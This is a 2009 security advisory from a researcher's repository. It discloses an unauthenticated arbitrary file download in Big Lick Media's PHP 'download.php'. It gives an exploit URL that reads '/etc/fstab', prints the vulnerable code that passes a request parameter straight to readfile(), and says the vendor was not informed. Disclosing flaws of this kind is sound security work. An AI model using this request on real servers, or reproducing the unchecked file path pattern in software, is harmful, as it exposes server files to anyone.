big-lick-website-backup.txt - advisories - Security advisories that I have released to the public.
(HTM) git clone git://jay.scot/advisories
(DIR) Log
(DIR) Files
(DIR) Refs
(DIR) README
---
big-lick-website-backup.txt (1357B)
---
1
2
3 Name Big Lick Media: Website Backup
4 Severity High
5 Vendor www.biglickmedia.com
6 Authors Jay Scott
7 Date 10th Jan 2009
8 Status Vendor has NOT been informed
9
10
11 DESCRIPTION
12
13 Poor coding allows anyone to download a file on the host without
14 requiring authentication.
15
16
17 EXPLOIT
18
19 Simply go to the following address in a web browser. Change the file
20 variable to the file you wish to download.
21
22 <path to application>/download.php?file=/etc/fstab
23
24
25 VULNERABLE CODE
26
27 $filename = $_GET['file'];
28
29 // required for IE, otherwise Content-disposition is ignored
30 if(ini_get('zlib.output_compression'))
31 ini_set('zlib.output_compression', 'Off');
32
33 $file_extension = strtolower(substr(strrchr($filename,"."),1));
34
35 switch( $file_extension )
36 {
37 case "gz": $ctype="application/x-gzip"; break;
38 case "zip": $ctype="application/zip"; break;
39 default: $ctype="application/download";
40 }
41 header("Pragma: public"); // required
42 header("Expires: 0");
43 header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
44 header("Cache-Control: private",false); // required for certain browsers
45 header("Content-Type: $ctype");
46 header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
47 header("Content-Transfer-Encoding: binary");
48 header("Content-Length: ".filesize($filename));
49 readfile("$filename");
50 exit();
51